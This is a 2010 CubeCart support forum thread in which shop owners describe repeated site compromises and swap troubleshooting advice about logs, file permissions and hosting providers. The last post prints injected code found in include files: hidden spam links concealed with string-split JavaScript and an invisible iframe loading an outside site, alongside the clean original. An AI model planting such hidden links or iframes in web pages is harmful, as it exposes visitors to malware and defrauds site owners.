Guest Posted August 9, 2010 Share Posted August 9, 2010 So the last few days, I've had someone alter the .htaccess file on one of my cubecart v3 stores to redirect to a chinese escort site! When it first happened, the store was still on v3 2.0.14 and I also found some code added to /index.php. I updated everything to 3.0.20, and cleaned the compromised files. I also disabled tellafriend (deleted all code from the file). It is shared hosting (in fact, I have a master account with unlimited domains and databases - it was only on one of the 20+ sites I have on the same account - not all are active or cubecart). It just happened again, after I upgraded to 3.0.20 and did the above steps! I changed the account password though my hosts didn't think they were getting in via the account but felt it was probably exploiting an outdated script. I cannot think of any scripts or anything on that site that isn't on my other live sites, so I'm scratching my head as to how this person is getting in. Only scripts I can think of beyond the usual cc ones are chat4support live chat and some google friend connect, facebook, and twitter scripts (but again, they are on all my other stores as well). So I thought I'd ask if anyone has had anything similar happen and if you figured out how they got in or how to stop it? Thanks! Quote Link to comment Share on other sites More sharing options...
Guest Posted August 10, 2010 Share Posted August 10, 2010 They managed to do it AGAIN after I have changed my password (to a totally randomly generated combo of letters, numbers, upper/lower etc). I have been searching all over the files to try to find some script they put in that keeps being triggered, but no luck so far. So annoying since they are doing it to a site I advertise as being "kid friendly" - which is probably why they targeted it I know. I deleted my google friend connect scripts since I wasn't using it much on that site anyway, but am at a loss of what else to try. Quote Link to comment Share on other sites More sharing options...
Guest Posted August 12, 2010 Share Posted August 12, 2010 This is still happening every day. Any idea of how I can stop it? I've changed passwords, deleted everything I can find script wise, changed chmod to 004 on .htaccess - and still they are somehow redirecting the thing to an escort service! With Halloween approaching, this is about to be my biggest site (cosplaycostumecloset.com) and I honestly don't know what the heck to try next :rolleyes: Quote Link to comment Share on other sites More sharing options...
vokf Posted August 12, 2010 Share Posted August 12, 2010 This is still happening every day. Any idea of how I can stop it? I've changed passwords, deleted everything I can find script wise, changed chmod to 004 on .htaccess - and still they are somehow redirecting the thing to an escort service! With Halloween approaching, this is about to be my biggest site (cosplaycostumecloset.com) and I honestly don't know what the heck to try next This could be an attack from a compromised script on another users site/account on the server. Is the .htaccess file being overwritten, or edited? Ie, does it still contain any customisation/SEO bits, or is now simply a redirect? Also check the date/time of the last change- is it always the same time each day? Ensure all other scripts are up to date - check their forums/changenotes for updates. Just because your other sites are not effected does not mean the scripts are not the entry vector! Check the languages/homepage folder on CubeCart is not writeable, I know that used to be recommended. Also see if you can get the raw HTTP logs and FTP logs. The best people to help with this would be your hosting company. They should have access logs- if you can determine the time of the change, they should be able to work out what it going on. Jason Quote Link to comment Share on other sites More sharing options...
Guest Posted August 14, 2010 Share Posted August 14, 2010 Well thought I had it solved but today someone edited my index.php file in the root directly. Quickly solved it by uploading my backup page, but... wasn't to the same escort site, this one was about footwear. I don't know if they edited or replaced my files - and my hosting company doesn't think they are hacking into my account itself (since I've changed the password to an auto generated random one, I'm also doubting they are doing that), but cannot figure out how to lock them out for good :( Quote Link to comment Share on other sites More sharing options...
vokf Posted August 14, 2010 Share Posted August 14, 2010 Well thought I had it solved but today someone edited my index.php file in the root directly. Quickly solved it by uploading my backup page, but... wasn't to the same escort site, this one was about footwear. I don't know if they edited or replaced my files - and my hosting company doesn't think they are hacking into my account itself (since I've changed the password to an auto generated random one, I'm also doubting they are doing that), but cannot figure out how to lock them out for good If they are getting in via cross-site-scripting (XSS), then the hack will involve calling a script on your site(s). This request will generate an event in the web server log. Tell the hosting company the exact date+time of the attack, and get them to check the apache raw logs for anything suspicious. Also ask them for the same info on FTP. Its in the hosts interest to assist you with this, and leaving you with constant attacks like this is not good. You may have access to the raw logs- in which case PM them to me. Quote Link to comment Share on other sites More sharing options...
Guest bluebadger66 Posted August 24, 2010 Share Posted August 24, 2010 I do not know too much about this type of problem, but when I had fears that my files were being changed, my hoster advised me to check my file permissions. There were lots that were set for anyone to write to. It is just a thought, and I am sure there is an article on here somewhere. Cheers, Martin Quote Link to comment Share on other sites More sharing options...
Guest Posted August 24, 2010 Share Posted August 24, 2010 I *think* I finally have them stopped. I changed permissions on my htaccess and they haven't redirected it since. I have been slowly updating all my stores to 3.0.20 as well and deleting the tellafriend scripts just to be on the safe side. Thanks for the help and suggestions guys. So far, so good though :( Quote Link to comment Share on other sites More sharing options...
Guest Posted September 7, 2010 Share Posted September 7, 2010 Well, update. My hacker doesn't seem to be able to redirect my page anymore - think the htaccess chmod stopped that. But today I discovered they had added marquee text to the top and bottom of my index.php (the root file) above and below the normal cubecart code (easy to delete really and it was unreadable on the site since the text overwrote itself). Haven't found any scripts added that aren't supposed to be there, but its still annoying :( Quote Link to comment Share on other sites More sharing options...
Guest Posted September 21, 2010 Share Posted September 21, 2010 Well, update. My hacker doesn't seem to be able to redirect my page anymore - think the htaccess chmod stopped that. But today I discovered they had added marquee text to the top and bottom of my index.php (the root file) above and below the normal cubecart code (easy to delete really and it was unreadable on the site since the text overwrote itself). Haven't found any scripts added that aren't supposed to be there, but its still annoying This is still happening like once a week. Any ideas? Quote Link to comment Share on other sites More sharing options...
bsmither Posted September 21, 2010 Share Posted September 21, 2010 You must convince your hosting provider to install an access and file list modification logging tool to the several server directories that hold your site's files, amd make those logs available to you. If they aren't working to find the method of intrusion themselves - and the server techs have this responsibility sitting squarely on their shoulders - then this has to be a breach in even the crummiest service level agreement. And you haven't told us whether your host has admitted if any of the other sites hosted on that particular server have been vandalized. If so, then the vandals are reaching your directories through someone else's vulnerability. As you describe it, you found "marquee text" above the CC code in {root}/index.php. So I guess whatever that was, wasn't meant to be sent immediately out to the browser since if it did, that should have caused a "Headers already sent" error. Quote Link to comment Share on other sites More sharing options...
Guest Posted September 21, 2010 Share Posted September 21, 2010 I actually haven't talked to my hosts about it much after the first attack. They usually just tell me to check that all scripts are up to date which is why I updated that cubecart installation to v3.0.20. Honestly, not sure what I'm looking for in logs. I have them, just no clue what to look for. I'm assuming you mean the raw access logs??? Or is it called something else? No errors are triggered. The code is being added above and below the existing cubecart code in root/index.php above the php start and end tags. At the bottom, its added after a ton of blank lines, at the top, it's a single line of code with tons of links added above the <?php and all the code. I'm assuming it is a script they are using to insert this code? The chmod on that file is 644 - I cannot make it 444 (I've tried and it reverts itself back), so really not sure how to totally keep them from doing it. Quote Link to comment Share on other sites More sharing options...
Guest Posted September 23, 2010 Share Posted September 23, 2010 Fingers crossed but I think I finally found where they were getting in. I found 2 files, link.php (which was encrypted) and llink.php in /includes/goobermods/coupon_giftcard_manager (goobers coupon mod) and when I looked at the original files for the mod (and where it is installed on another of my stores), discovered these files shouldn't be there. I deleted them both and change permissions on both folders to 555 so hopefully that will stop it this time. I'll let you know if it does or not but if anyone else has this issue, look *everywhere* for files you don't recognize. I had compared all the files to the v3.0.20 standard files, but had skipped the mods! (silly me)! Quote Link to comment Share on other sites More sharing options...
Guest Posted September 23, 2010 Share Posted September 23, 2010 Grrrr. Well not stopped yet The top code reappeared though those 2 files didn't return. Thought I had it figured out :( Quote Link to comment Share on other sites More sharing options...
Guest fandango Posted September 26, 2010 Share Posted September 26, 2010 Hiya Mysty, This sounds like a hack attack I had not long ago. Unfortunatly I had to completely delete and reinstall all my files and folders and install a fresh copy of CC3 I do remember reading up on this Zombie attack as it was called and they injected code into the index.php files from scripts that had been inserted into the images folders. I hope you sort it out and dont have to do what I did. (Took forever) Fandango Quote Link to comment Share on other sites More sharing options...
SibeSpace Posted September 26, 2010 Share Posted September 26, 2010 My site has been hacked today too. Customer got a browser warning: "Visiting this site may harm your computer The website at www..... contains elements from the site robingood.cz.cc which appears to host malware - software" It had infected the root/index.php, admin/index.php, admin/modules/index.php & admin/modules/3rdparty/index.php No idea how they got in, nor how to stop them from doing it again. Any suggestions please? thanks Quote Link to comment Share on other sites More sharing options...
SibeSpace Posted September 26, 2010 Share Posted September 26, 2010 I'm also getting an error on the Admin home page: Warning: MagpieRSS: Failed to fetch http://forums.cubecart.com/index.php?act=rssout&id=1 (HTTP Response: HTTP/1.1 404 Not Found ) in /classes/rss_fetch.inc on line 238 Warning: Invalid argument supplied for foreach() in /admin/index.php on line 152 Quote Link to comment Share on other sites More sharing options...
bsmither Posted September 26, 2010 Share Posted September 26, 2010 Same suggestion as we gave Mysty - contact your host and ask for the access logs for your site, HTTP requests and FTP logins, and ask your host for help in discovering the vulnerability. Ask your host to put a logging tool on your site that logs all accesses, regardless of method, to your store root. I am not familiar with Linux, so my knowledge of if such a tool exists is null, but I am confident a Linux Guru somewhere has created such a tool. Warning: MagpieRSS: Remove the RSS URL from the settings page. A number of messages on this board are mentioning that. Maybe a problem with cubecart.com? Quote Link to comment Share on other sites More sharing options...
SibeSpace Posted September 30, 2010 Share Posted September 30, 2010 Thanks. Removed the RSS feed as suggested - that error has now gone. I uploaded a backup copy of all the infected files, changed my hosting password & so far - all is OK. I guess I won't know if I've stopped another attack until it happens.. Quote Link to comment Share on other sites More sharing options...
Guest Posted October 9, 2010 Share Posted October 9, 2010 The latest files I found compromised were /admin/misc/licForm.php and lookupip.php. I re-uploaded the uncorrupted files and changed their file permissions to 444 to see if that stops it. Quote Link to comment Share on other sites More sharing options...
Guest Posted November 2, 2010 Share Posted November 2, 2010 Well, update I've found inserted code into just about all my includes files. No idea how it all got there, but thought I'd give someone else an idea of where to look for changes Some of them were repeated more than once, sometimes the block was there just once. I copied what *should* have been there and pasted it over the junk. These are right under the cubecart comment block at the top of the files. if (eregi(".inc.php",$HTTP_SERVER_VARS['PHP_SELF']) || eregi(".inc.php",$_SERVER['PHP_SELF'])) { echo "<html>\r\n<head>\r\n<title>Forbidden 403</title>\r\n</head>\r\n<body><div id='302'><h2><a href='http://www.2daban.cn/' title='Î÷ÃÅ×ÓPLC' >Î÷ÃÅ×ÓPLC</a></h2><h2><a href='http://www.fashion-pictures-show.com/' title='Fashion'>Fashion</a></h2><h2><a href='http://www.disease-picture.com/' title='Health'>Health</a></h2><h2><a href='http://www.siemens-plc-adapter.com/' title='SIEMENS PLC adapter' >SIEMENS PLC adapter</a></h2><h2><a href='http://www.plc-programming-cable.com/' title='plc programming cable'>plc programming cable</a></h2><h2><a href='http://www.pci-pcmcia-express.com/' title='PCI,PCMCIA,Express card'>PCI,PCMCIA,Express card</a></h2><h2><a href='http://www.electronic-pic.com/' title='Electronic'>Electronic</a></h2></div><script>document.getElementById('3'+'0'+'2').style.display='n'+'o'+'ne'</script><h3>Forbidden 403</h3>\r\nThe document you are requesting is forbidden.\r\n<iframe src=http://googlerank.info width=1 height=1 style=display:none></iframe><div id='257'><h2><a href='http://www.2daban.cn/' title='Î÷ÃÅ×ÓPLC' >Î÷ÃÅ×ÓPLC</a></h2><h2><a href='http://www.fashion-pictures-show.com/' title='Fashion'>Fashion</a></h2><h2><a href='http://www.disease-picture.com/' title='Health'>Health</a></h2><h2><a href='http://www.siemens-plc-adapter.com/' title='SIEMENS PLC adapter' >SIEMENS PLC adapter</a></h2><h2><a href='http://www.plc-programming-cable.com/' title='plc programming cable'>plc programming cable</a></h2><h2><a href='http://www.pci-pcmcia-express.com/' title='PCI,PCMCIA,Express card'>PCI,PCMCIA,Express card</a></h2><h2><a href='http://www.electronic-pic.com/' title='Electronic'>Electronic</a></h2></div><script>document.getElementById('2'+'5'+'7').style.display='non'+'e'</script></body>\r\n</html>"; exit; } What the code *should* look like is: if (eregi(".inc.php",$HTTP_SERVER_VARS['PHP_SELF']) || eregi(".inc.php",$_SERVER['PHP_SELF'])) { echo "<html>\r\n<head>\r\n<title>Forbidden 403</title>\r\n</head>\r\n<body><h3>Forbidden 403</h3>\r\nThe document you are requesting is forbidden.\r\n</body>\r\n</html>"; exit; } Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.